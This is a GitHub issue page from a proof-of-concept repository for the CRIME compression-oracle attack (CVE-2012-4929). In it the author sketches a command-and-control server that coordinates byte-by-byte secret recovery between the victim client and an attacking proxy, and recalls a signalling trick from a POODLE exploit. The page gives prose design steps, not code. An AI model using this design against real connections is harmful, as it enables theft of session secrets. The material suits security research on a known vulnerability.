Giters

mpgn / CRIME-poc

:hocho: CRIME attack PoC : a compression oracle attacks CVE-2012-4929 :hocho:

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Add C&C server (client <-> proxy)

mpgn opened this issue · comments

commented

Add a C&C server on the proxy side to send command to the client.

The command allow an attacker to know what byte is send and inform the client when a byte is found.

Unless the poodle exploit I already made a C&C is mandatory. On the poodle poc, to inform the client of something, I sent an HMAC error to the response of the AJAX request by altering the last byte of the encrypted request. Therefore, the client knew something was discovered on the proxy side and he could to something else. (this technique was used to find the length of a block, yes it's very binary but it allow me to simplify the exploit maximally).

How it works ?

  1. On the client side :

    • send byte to C&C
    • send byte to the remote server

  2. On the C&C side :

    • byte recieve
    • check the length of the request from the proxy
    • send response to the client (ok, nok)

  3. On the client side :

    • receive response from the server
    • receive response from the C&C
    • regarding the response, add another byte or next byte

💥🔥💀